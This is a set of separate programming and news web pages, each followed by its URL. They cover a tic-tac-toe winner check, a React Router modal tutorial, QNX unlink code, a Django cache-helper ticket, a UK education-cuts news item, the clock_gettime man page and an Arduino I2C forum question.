So you can call cell_owner(1) to get a function which accepts a value and checks if it is 1. This seems useless on its own, but with such a function you can use all and map to check a whole cells group in one line:

# will return True if each cell in <cells_group> belongs to <player>
all(map(cell_owner(<player>), <cells_group>))

Before doing this, you can prepare a list of cells groups which are winnable, and then iterate over the list, applying the all/map functions to each group to determine whether a player won.
Below is a complete example with some extra functions for test purposes:

import random

def gen_random_grid(size):
    """just for test purpose: generate a randomly filled grid"""
    return [[random.randint(0, 2) for col in range(size)] for row in range(size)]

def print_grid(grid):
    """just for test purpose: prints the grid"""
    size = len(grid)
    row_sep = "+{}+".format("+".join(["---"] * size))
    row_fmt = "|{}|".format("|".join([" {} "] * size))
    print(row_sep)
    for row in grid:
        print(row_fmt.format(*row))
        print(row_sep)

def cell_owner(player):
    """returns a function which can check if a cell belongs to provided player"""
    def wrapped(cell):
        return player == cell
    return wrapped

def get_winner(grid):
    """determines if there is a winner"""
    size = len(grid)
    # prepare list of potentially winning cells groups
    cells_groups_to_check = grid[:]  # rows
    cells_groups_to_check += [[grid[row][col] for row in range(size)]
                              for col in range(size)]  # cols
    cells_groups_to_check.append(
        [grid[index][index] for index in range(size)])  # diag 1
    cells_groups_to_check.append(
        [grid[index][size - 1 - index] for index in range(size)])  # diag 2

    winner = 0
    for y in range(1, 3):  # 0 is not a player, no need to test it
        # for each player...
        for group in cells_groups_to_check:
            # ... check if a cells group is complete
            if all(map(cell_owner(y), group)):
                winner = y
                break
        if winner:
            break
    return winner

# generate some random grids of different sizes
TEST_GRIDS = [gen_random_grid(3) for _ in range(3)]
TEST_GRIDS += [gen_random_grid(2) for _ in range(3)]
TEST_GRIDS += [gen_random_grid(4) for _ in range(3)]

# demonstration
for grid in TEST_GRIDS:
    print_grid(grid)
    print("Winner is {}".format(get_winner(grid)))

Note this code should work for any square grid, whatever its size.
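If you prefer to skip the function factory, the same line-gathering idea can be written more compactly by comparing each line of cells against a set. This is just a sketch of an alternative; the helper name get_winner_simple is made up here:

```python
def get_winner_simple(grid):
    """Return the winning player (1 or 2) on a square grid, or 0 if nobody won."""
    size = len(grid)
    lines = list(grid)                                          # rows
    lines += [list(col) for col in zip(*grid)]                  # columns
    lines.append([grid[i][i] for i in range(size)])             # main diagonal
    lines.append([grid[i][size - 1 - i] for i in range(size)])  # anti-diagonal
    for line in lines:
        # a line is a win when it holds a single repeated player value
        if len(set(line)) == 1 and line[0] in (1, 2):
            return line[0]
    return 0
```

For the board from the question, get_winner_simple([[1, 2, 0], [2, 1, 0], [2, 1, 0]]) returns 0, matching the "Nobody won" case (the only complete column is all zeroes, and 0 is not a player).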
Modals are very useful for displaying one view on top of another. However, when it comes to implementation, they are more than an absolutely positioned <div> element wrapping everything, especially if you need dynamic URLs, page refreshes, or a simple scrolling interaction on a mobile device. In this article, we'll discuss the various aspects of modals and identify solutions to satisfy the requirements that come with creating dynamic URLs, page refreshes, and other features.

Before starting to shape the modal component, let's cover some basics of the react-router package. We'll use four components from this package: BrowserRouter, Route, Link, and Switch. Since this is not a react-router tutorial, I won't be explaining what each of these components does. However, if you'd like some info about react-router, you can check out this page.

Basic routing

First, go ahead and install react-router-dom through npm.

npm install react-router-dom --save

At the very top level of your application, use the <BrowserRouter/> component to wrap your app.

import { BrowserRouter } from "react-router-dom";

ReactDOM.render(
  <BrowserRouter>
    <App />
  </BrowserRouter>,
  document.getElementById('root')
);

Inside <App/>, you'll need to specify the routes so that you can render a specific view when one of them — or none of them — match. Let's assume we have three different components to render: <Home/>, <About/>, and <Contact/>. We'll create a navigation menu, which will always be visible at the very top of the application. The <Link/> or <NavLink/> components from react-router-dom are used for navigation purposes; <NavLink/> has the special feature of accepting specific styling when the current URL matches. Functionality-wise, you can use either one.
Below is the basic structure of the navigation menu, which changes the URL accordingly:

render() {
  return (
    <div className="app">
      <div className="menu">
        <Link className="link" to='/'>Home</Link>
        <Link className="link" to='/about'>About</Link>
        <Link className="link" to='/contact'>Contact</Link>
      </div>
    </div>
  );
}

The next thing we'll do is implement the mechanism that matches the URL and renders a specific component. <Switch/> renders the first matching location specified by its <Route/> children. When nothing is matched, the last <Route/> is rendered — usually as a 404 page.

render() {
  return (
    <div className="app">
      <div className="menu">
        <Link className="link" to='/'>Home</Link>
        <Link className="link" to='/about'>About</Link>
        <Link className="link" to='/contact'>Contact</Link>
      </div>
      <Switch>
        <Route exact path="/" component={Home} />
        <Route exact path="/contact" component={Contact} />
        <Route exact path="/about" component={About} />
        <Route>{'404'}</Route>
      </Switch>
    </div>
  );
}

Creating a modal component

So far, we've implemented the basic routing structure. Now we can create a modal component and work on displaying it as an overlay. Although there are a variety of different methods for creating modal components, we'll only be covering one.

A modal component has a wrapper element which spans the whole screen, width and height. This area also acts as a clicked-outside detector. The actual modal element is then positioned relative to that wrapper element.

Below is an example of a <Modal/> functional component using the withRouter HOC (higher-order component) to access the router history and call its goBack() method, changing the application URL when the modal is closed by a click on .modal-wrapper. onClick={e => e.stopPropagation()} is used to stop the click event from propagating up and triggering the onClick on .modal-wrapper, which would otherwise close the modal when the actual .modal element is clicked.
import React from 'react';
import { withRouter } from 'react-router-dom';

const Modal = ({ history }) => (
  <div
    role="button"
    className="modal-wrapper"
    onClick={() => history.goBack()}
  >
    <div
      role="button"
      className="modal"
      onClick={e => e.stopPropagation()}
    >
      <p>
        CONTENT
      </p>
    </div>
  </div>
);

export default withRouter(Modal);

Note that withRouter injects the history object as a prop; since this is a functional component, there is no this.props, so the component receives history directly.

Styling the .modal-wrapper is just as important. Below, you can find the basic styling used to make it span the whole screen and appear above the content. Using -webkit-overflow-scrolling: touch enables elastic scroll on iOS devices.

.modal-wrapper {
  position: fixed;
  left: 0;
  top: 0;
  width: 100%;
  height: 100vh;
  overflow-y: scroll;
  -webkit-overflow-scrolling: touch;
}

Opening the modal view

The modal component we created should render on top of the existing view when a specific URL is matched, meaning that somehow we have to change the URL so the routing mechanism can decide what to render. We know that <Switch/> renders the first matching location, but a modal overlay needs two <Route/> components rendering at the same time. This can be achieved by putting the modal <Route/> outside of <Switch/> and rendering it conditionally. In this case, we should be able to detect whether a modal is active or not. The easiest way to do this is by passing a state variable along with the <Link/> component. In the same way we used the <Link/> component to create the navigation menu, we'll use it to trigger a modal view. The usage shown below lets us define a state variable, which is then made available in the location prop, which we can access within any component using the withRouter HOC.

<Link
  to={{
    pathname: '/modal/1',
    state: { modal: true }
  }}
>
  Open Modal
</Link>

Put this anywhere you want. Clicking the link will change the URL to /modal/1. There might be several modals with different names like modal/1, modal/2, and so on. In this case, you're not expected to define a separate <Route/> to match each individual modal location.
In order to handle all of them under the /modal route, use the following syntax:

<Route exact path="/modal/:id" component={Modal} />

This gives you the flexibility of getting the value of the :id parameter within the modal component through the match.params prop. It also lets you render dynamic content, depending on which modal is open.

Matching the modal location

This section is particularly important because it identifies the mechanism for displaying a modal on top of an existing view even though the location changes when a modal is opened. When we click the Open Modal link defined in the previous section, it will change the location path to /modal/1, which matches nothing in <Switch/>. So we have to define the following <Route/> somewhere.

<Route exact path="/modal/:id" component={Modal} />

We want to display the <Modal/> component as an overlay. However, putting it inside <Switch/> would match it and only render the <Modal/> component. As a result, there would be no overlay. To resolve this problem, we need to define it both inside and outside of <Switch/> with extra conditions. Below, you'll see the modified version of the same snippet. There are several changes. Let's list them quickly:

- There is a previousLocation variable defined in the constructor.
- There is an isModal variable defined, which depends on some other values.
- <Switch/> is using a location prop.
- <Route exact path="/modal/:id" component={Modal} /> is used both inside and outside <Switch/>, and the one outside is conditionally rendered.

When a modal is opened, we need to store the previous location object and pass this to <Switch/> instead of letting it use the current location object by default. This basically tricks <Switch/> into thinking it's still on the previous location — for example / — even though the location changes to /modal/1 after the modal is opened. This can be achieved by setting the location prop on <Switch/>.
The following snippet replaces previousLocation with the current location object when there is no open modal. When you open a modal, it doesn't modify previousLocation. As a result, we can pass it to <Switch/> to make it think we're still on the same location, even though we changed the location by opening a modal.

We know that when a modal is opened, the state variable named modal in the location object will be set to true. We can check whether the state of the location object is defined and has the modal variable set to true. However, these two checks alone do not suffice in the case of refreshing the page: while the modal has to be closed on its own, location.state && location.state.modal still holds. By also checking this.previousLocation !== location, we can make sure that refreshing the page will not result in setting isModal to true. When the modal route is visited directly, which is /modal/1 in our example, none of the checks are true.

Now we can use this boolean value both to render the <Route/> outside of <Switch/> and to decide which location object to pass to the location prop of <Switch/>. Given that the <Modal/> component has the necessary stylings, this results in two different views rendering on top of each other.

constructor(props) {
  super(props);
  this.previousLocation = this.props.location;
}

componentWillUpdate() {
  const { location } = this.props;
  if (!(location.state && location.state.modal)) {
    this.previousLocation = this.props.location;
  }
}

render() {
  const { location } = this.props;
  const isModal = (
    location.state &&
    location.state.modal &&
    this.previousLocation !== location
  );

  return (
    <div className="app">
      <Switch location={isModal ? this.previousLocation : location}>
        <Route exact path="/" component={Home} />
        <Route exact path="/contact" component={Contact} />
        <Route exact path="/about" component={About} />
        <Route exact path="/modal/:id" component={Modal} />
        <Route>{'404'}</Route>
      </Switch>
      {isModal
        ? <Route exact path="/modal/:id" component={Modal} />
        : null}
    </div>
  );
}

Rendering different modal views

So far we have implemented our modal in a way that ensures we don't render an overlay when refreshing a page with an open modal, or when directly visiting a modal route. Instead, we only render the matching <Route/> inside <Switch/>.
In this case, the styling you want to apply is likely to be different, or you might want to show different content. This is pretty easy to achieve by passing the isModal variable as a prop on the <Modal/> component, as shown below. Then, depending on the value of the prop, you can apply different stylings or return completely different markup.

{isModal
  ? <Route exact path="/modal/:id">
      <Modal isModal />
    </Route>
  : null}

Preventing the scroll underneath the modal

When you open the modal on some browsers, the content below may keep scrolling underneath the modal, which is not a desirable interaction. Using overflow: hidden on body is the first attempt to block scrolling on the entire page. However, although this method works fine on desktop, it fails on mobile Safari, which basically ignores overflow: hidden on body.

There are several npm packages attempting to remedy this scroll-locking issue across virtually all platforms. I found the body-scroll-lock package quite useful. From this package, you can import the disableBodyScroll and enableBodyScroll functions, which accept as input a reference to the element for which you want scrolling to persist.

When the modal is open, we want to disable scrolling for the entire page, except for the modal itself. Therefore, we need to call the disableBodyScroll and enableBodyScroll functions when the modal component is mounted and unmounted, respectively. To get a reference to the parent <div> of the modal component, we can use the createRef API from React and pass it as a ref to the parent <div>. The code snippet below disables scrolling when the modal is open and enables it again when the modal component is about to be unmounted. Using this.modalRef as the input for these imported functions prevents the content of the modal component from being scroll-locked. Before using the disableBodyScroll function, we need a simple check.
This is because a modal component might get mounted if the page is refreshed while a modal is open, or when the modal route is visited directly. In both cases, scrolling should not be disabled. We have already passed the isModal variable as a prop to the <Modal/> component to render different views, so we can just use this prop to check whether there is actually a modal. Below is the modified version of the modal component:

import { disableBodyScroll, enableBodyScroll } from 'body-scroll-lock';

class Modal extends Component {
  constructor(props) {
    super(props);
    this.modalRef = React.createRef();
  }

  componentDidMount() {
    const { isModal } = this.props;
    if (isModal) {
      disableBodyScroll(this.modalRef.current);
    }
  }

  componentWillUnmount() {
    enableBodyScroll(this.modalRef.current);
  }

  render() {
    return (
      <div
        ref={this.modalRef}
        className="modal-wrapper"
        onClick={() => this.props.history.goBack()}
      >
        <div
          className="modal"
          onClick={e => e.stopPropagation()}
        >
        </div>
      </div>
    )
  }
}

Conclusion

You now have an understanding of how a modal view works, as well as a sense of some of the problems you may encounter while implementing your own integration. For the fully functional example, visit this code sandbox: "Building a modal module for React with React-Router".

Thanks for the tutorial. I just don't understand why you built this with class components, which are 10 times longer and needlessly complicated, instead of the modern, super simple functional components. I'm crying converting all the files.

Great tutorial, thanks. I found this behavior: on refreshing the page with an open modal, you lose the previous location value, and then only the modal component renders. Is there any way to keep the background and the open modal after a refresh?

Thanks for this post. Any idea how to implement this with functional components?
https://blog.logrocket.com/building-a-modal-module-for-react-with-react-router/
To unlink an entry, the following code is used:

int c_unlink (resmgr_context_t *ctp, io_unlink_t *msg,
              RESMGR_HANDLE_T *handle, void *reserved)
{
    des_t   parent, target;
    int     sts;
    struct _client_info cinfo;

    if (sts = iofunc_client_info (ctp, 0, &cinfo)) {
        return (sts);
    }

    if (connect_msg_to_attr (ctp, &msg -> connect, handle,
                             &parent, &target, &sts, &cinfo)) {
        return (sts);
    }

    if (sts != EOK) {
        return (sts);
    }

    // see below
    if (target.attr == handle) {
        return (EBUSY);
    }

    return (cfs_rmnod (&parent, target.name, target.attr));
}

The code implementing c_unlink() is straightforward as well—we get the client information and resolve the pathname. The destination had better exist, so if we don't get an EOK we return the error to the client. Also, it's a really bad idea (read: bug) to unlink the mount point, so we make a special check against the target attribute's being equal to the mount point attribute, and return EBUSY if that's the case.

Note that QNX 4 returns the constant EBUSY, QNX Neutrino returns EPERM, and OpenBSD returns EISDIR. So, there are plenty of constants to choose from in the real world! I like EBUSY.

Other than that, the actual work is done in cfs_rmnod(), below.

int cfs_rmnod (des_t *parent, char *name, cfs_attr_t *attr)
{
    int sts;
    int i;

    // 1) remove target
    attr -> attr.nlink--;
    if ((sts = release_attr (attr)) != EOK) {
        return (sts);
    }

    // 2) remove the directory entry out of the parent
    for (i = 0; i < parent -> attr -> nels; i++) {
        // 3) skip empty directory entries
        if (parent -> attr -> type.dirblocks [i].name == NULL) {
            continue;
        }
        if (!strcmp (parent -> attr -> type.dirblocks [i].name, name)) {
            break;
        }
    }

    if (i == parent -> attr -> nels) {
        // huh. gone. This is either some kind of internal error,
        // or a race condition.
        return (ENOENT);
    }

    // 4) reclaim the space, and zero out the entry
    free (parent -> attr -> type.dirblocks [i].name);
    parent -> attr -> type.dirblocks [i].name = NULL;

    // 5) catch shrinkage at the tail end of the dirblocks[]
    while (parent -> attr -> type.dirblocks [parent -> attr -> nels - 1].name == NULL) {
        parent -> attr -> nels--;
    }

    // 6) could check the open count and do other reclamation
    //    magic here, but we don't *have to* for now...
    return (EOK);
}

Notice that we may not necessarily reclaim the space occupied by the resource! That's because the file could be in use by someone else. So the only time that it's appropriate to actually remove it is when the link count goes to zero, and that's checked for in the release_attr() routine as well as in the io_close_ocb() handler (below). Here's the walkthrough:
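The dirblocks[] bookkeeping in steps 2 through 5 can also be modeled outside of QNX. The sketch below is plain Python, not resource-manager code; DirAttr and rmnod_entry are invented names standing in for cfs_attr_t and the directory-removal portion of cfs_rmnod().

```python
# Toy model of the cfs_rmnod() directory bookkeeping (steps 2-5 above).
# DirAttr is a hypothetical stand-in for cfs_attr_t.

class DirAttr:
    def __init__(self, names):
        # dirblocks holds entry names; None marks an empty slot
        self.dirblocks = list(names)
        self.nels = len(names)

def rmnod_entry(parent, name):
    """Remove `name` from parent.dirblocks, then shrink the tail."""
    # 2) find the directory entry, 3) skipping empty slots
    for i in range(parent.nels):
        if parent.dirblocks[i] is None:
            continue
        if parent.dirblocks[i] == name:
            break
    else:
        # gone already: internal error or a race condition
        return "ENOENT"
    # 4) reclaim the slot and zero out the entry
    parent.dirblocks[i] = None
    # 5) catch shrinkage at the tail end of dirblocks[]
    while parent.nels and parent.dirblocks[parent.nels - 1] is None:
        parent.nels -= 1
    return "EOK"
```

Removing the last entry shrinks nels immediately, and removing an interior entry leaves a None hole that is reclaimed later, once everything after it has also been removed — the same behavior the C loop in step 5 produces.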
http://www.qnx.com/developers/docs/6.6.0_anm11_wf10/com.qnx.doc.neutrino.cookbook/topic/s2_ramdisk_c_unlink.html
Opened 11 years ago
Closed 11 years ago

#953 closed enhancement (invalid)

helper functions to get/set file dependent cache data

Description

from django.core.cache import cache
import sha, os

FILE_CACHE_TIMEOUT = 60 * 60 * 60 * 24 * 31   # 1 month
FILE_CACHE_FMT = '%(name)s_%(hash)s'

def set_cached_file(path, value):
    """
    Store file dependent data in cache.
    Timeout is set to FILE_CACHE_TIMEOUT (1 month).
    Key is created from the base name of the file and the SHA1 digest
    of the path.
    """
    mtime = os.path.getmtime(path)
    sh = sha.new()
    sh.update(path)
    hash = sh.hexdigest()
    name = os.path.basename(path)
    cache.set(FILE_CACHE_FMT % locals(), (mtime, value,), FILE_CACHE_TIMEOUT)

def get_cached_file(path, default=None):
    """
    Get file content from cache.
    If the modification time differs, return None and delete the data
    from the cache.
    """
    sh = sha.new()
    sh.update(path)
    hash = sh.hexdigest()
    name = os.path.basename(path)
    key = FILE_CACHE_FMT % locals()
    cached = cache.get(key, default)
    if cached is None:
        return None
    mtime, value = cached
    if (not os.path.isfile(path)) or (os.path.getmtime(path) != mtime):
        # file is changed or deleted
        cache.delete(key)   # delete from cache
        return None
    else:
        return value

Change History (2)

comment:1 Changed 11 years ago by
Can you please explain what this is and why you're filing it as a ticket?

comment:2 Changed 11 years ago by
Sorry, I didn't think before I sent this ticket. :) This is just a pair of helper functions to manage cache entries which are dependent on some file-stored data. Probably a ticket is not the right place for this, so I'm closing this.

Note: See TracTickets for help on using tickets.
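The idea in the ticket — invalidating a cached value when the backing file's mtime changes — can be sketched without Django at all. The snippet below is a self-contained model, not part of the ticket: a plain dict stands in for Django's cache backend, and the function names mirror the ticket's helpers.

```python
import os
import hashlib

# Plain-dict stand-in for a cache backend, with the same
# mtime-validation trick as the ticket's helpers.
_store = {}

def _key(path):
    # base name plus a hash of the full path, like FILE_CACHE_FMT
    digest = hashlib.sha1(path.encode()).hexdigest()
    return '%s_%s' % (os.path.basename(path), digest)

def set_cached_file(path, value):
    # remember the file's mtime alongside the value
    _store[_key(path)] = (os.path.getmtime(path), value)

def get_cached_file(path, default=None):
    cached = _store.get(_key(path))
    if cached is None:
        return default
    mtime, value = cached
    if not os.path.isfile(path) or os.path.getmtime(path) != mtime:
        # file changed or deleted: drop the stale entry
        del _store[_key(path)]
        return default
    return value
```

One small difference from the ticket's version: a cache miss here returns the caller's default rather than always None, which is probably what the original author intended the default parameter to do.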
https://code.djangoproject.com/ticket/953
21 October 2010 16:08 [Source: ICIS news]

LONDON (ICIS)--Education cuts announced as part of UK chancellor George Osborne's spending review on 20 October pose a grave risk to industry, David Brown, CEO of the Institution of Chemical Engineers (IChemE), said on Thursday.

Brown said that cuts to the education budget could harm industry.

"If we can't produce enough talented scientists and engineers each year to meet industry demand, inward investment will suffer and our economic prosperity will be further weakened," Brown said.

In addition, Brown said that the decision to freeze the science budget in cash terms would also mean that tough times are ahead; however, he cautiously welcomed the news, saying that things could have been considerably worse.

The UK energy and climate change budget was also cut by 5%, and Brown urged caution on where the savings might be made.

"…slashing investment in low-carbon technology now will cost more money in the longer term," he said.
http://www.icis.com/Articles/2010/10/21/9403445/education-budget-cuts-pose-grave-risk-to-uk-industry-icheme.html
clock_gettime(3)          BSD Library Functions Manual          clock_gettime(3)

NAME
     clock_gettime, clock_settime, clock_getres, clock_gettime_nsec_np --
     get/set date and time

SYNOPSIS
     #include <time.h>

     int clock_gettime(clockid_t clock_id, struct timespec *tp);
     int clock_settime(clockid_t clock_id, const struct timespec *tp);
     int clock_getres(clockid_t clock_id, struct timespec *tp);
     uint64_t clock_gettime_nsec_np(clockid_t clock_id);

DESCRIPTION
     The clock_gettime() and clock_settime() functions allow the calling
     process to retrieve or set the value used by a clock which is specified
     by clock_id.

     clock_id can be one of the following predefined values:

     CLOCK_REALTIME             the system's real time (i.e. wall time)
                                clock, expressed as the amount of time since
                                the Epoch.  This is the same as the value
                                returned by gettimeofday(2).

     CLOCK_MONOTONIC            clock that increments monotonically, tracking
                                the time since an arbitrary point, and will
                                continue to increment while the system is
                                asleep.

     CLOCK_MONOTONIC_RAW        clock that increments monotonically, tracking
                                the time since an arbitrary point like
                                CLOCK_MONOTONIC.  However, this clock is
                                unaffected by frequency or time adjustments.
                                It should not be compared to other system
                                time sources.

     CLOCK_MONOTONIC_RAW_APPROX like CLOCK_MONOTONIC_RAW, but reads a value
                                cached by the system at context switch.  This
                                can be read faster, but at a loss of accuracy
                                as it may return values that are milliseconds
                                old.

     CLOCK_UPTIME_RAW           clock that increments monotonically, in the
                                same manner as CLOCK_MONOTONIC_RAW, but that
                                does not increment while the system is
                                asleep.  The returned value is identical to
                                the result of mach_absolute_time() after the
                                appropriate mach_timebase conversion is
                                applied.

     CLOCK_UPTIME_RAW_APPROX    like CLOCK_UPTIME_RAW, but reads a value
                                cached by the system at context switch.  This
                                can be read faster, but at a loss of accuracy
                                as it may return values that are milliseconds
                                old.
     CLOCK_PROCESS_CPUTIME_ID   clock that tracks the amount of CPU (in
                                user- or kernel-mode) used by the calling
                                process.

     CLOCK_THREAD_CPUTIME_ID    clock that tracks the amount of CPU (in
                                user- or kernel-mode) used by the calling
                                thread.

     The structure pointed to by tp is defined in <sys/time.h> as:

             struct timespec {
                     time_t  tv_sec;   /* seconds */
                     long    tv_nsec;  /* and nanoseconds */
             };

     Only the CLOCK_REALTIME clock can be set, and only the superuser may do
     so.

     The resolution of a clock is returned by the clock_getres() call.  This
     value is placed in a (non-null) *tp.  This value may be smaller than the
     actual precision of the underlying clock, but represents a lower bound
     on the resolution.

     As a non-portable extension, the clock_gettime_nsec_np() function will
     return the clock value in 64-bit nanoseconds.

RETURN VALUES
     A 0 return value indicates that the call succeeded.  A -1 return value
     indicates an error occurred, and in this case an error code is stored
     into the global variable errno.

     For clock_gettime_nsec_np() a return value of non-0 indicates success.
     A 0 return value indicates an error occurred and an error code is
     stored in errno.

ERRORS
     clock_gettime(), clock_settime(), clock_getres(), and
     clock_gettime_nsec_np() will fail if:

     [EINVAL]   clock_id is not a valid value.

     [EFAULT]   The tp argument address referenced invalid memory.

     In addition, clock_settime() may return the following errors:

     [EPERM]    A user other than the superuser attempted to set the time.

     [EINVAL]   clock_id specifies a clock that isn't settable, tp specifies
                a nanosecond value less than zero or greater than 1000
                million, or a value outside the range of the specified clock.

SEE ALSO
     date(1), getitimer(2), gettimeofday(2),

HISTORY
     These functions first appeared in Mac OS X 10.12.

STANDARDS
     The clock_gettime(), clock_settime(), and clock_getres() system calls
     conform to IEEE Std 1003.1b-1993 (``POSIX.1'').
     clock_gettime_nsec_np() is a non-portable Darwin extension.
     The clock IDs CLOCK_MONOTONIC_RAW and CLOCK_UPTIME_RAW are extensions
     to the POSIX interface.

BSD                             January 26, 2016                          BSD

Mac OS X 10.12.3 - Generated Wed Feb 8 05:51:11 CST 2017
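The same interfaces can be exercised from a high-level language. The sketch below uses Python's time module, which wraps clock_gettime(3) and clock_getres(3) on Unix systems; note that CLOCK_MONOTONIC_RAW and the _APPROX clock IDs are only exposed where the platform provides them, so this sticks to the portable clocks.

```python
import time

# Read the wall clock and the monotonic clock via clock_gettime().
wall = time.clock_gettime(time.CLOCK_REALTIME)   # seconds since the Epoch
t0 = time.clock_gettime(time.CLOCK_MONOTONIC)
t1 = time.clock_gettime(time.CLOCK_MONOTONIC)

# CLOCK_MONOTONIC never goes backwards, unlike CLOCK_REALTIME,
# which can be stepped by clock_settime() or NTP.
assert t1 >= t0

# clock_getres() reports a lower bound on the clock's resolution.
res = time.clock_getres(time.CLOCK_MONOTONIC)
assert res > 0

# time.monotonic_ns() plays a role similar to clock_gettime_nsec_np():
# the same reading, but as integer nanoseconds with no timespec struct.
elapsed_ns = time.monotonic_ns()
```

Preferring CLOCK_MONOTONIC over CLOCK_REALTIME for interval measurement is the practical takeaway here: wall-clock time can jump, monotonic time cannot.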
http://www.manpagez.com/man/3/clock_gettime_nsec_np/
Master:

#include <Wire.h>

int slaveIn;

void setup() {
  Wire.begin();
}

void loop() {
  Wire.requestFrom(1, 1);
  while (Wire.available() == 0);
  slaveIn = Wire.read();
  Serial.println(slaveIn);
  delay(1000);
}

Slave:

#include <Wire.h>

int counter = 0;

void setup() {
  Wire.begin(1);
}

void loop() {
  Wire.onRequest(request);
}

void request() {
  Wire.write(counter);
  counter++;
}

I'm having trouble getting the master to request a byte of data, the slave to send that data, and then the master to print that data.

Quote
I'm having trouble getting the master to request a byte of data, the slave to send that data, and then the master to print that data.

But, you want to keep the problem a secret. Well, then, we'll need to keep the solution a secret, too.

Wire.onRequest() registers an event handler to be called when an event occurs. You only need to do that once, in setup().
http://forum.arduino.cc/index.php?topic=148028.0;prev_next=prev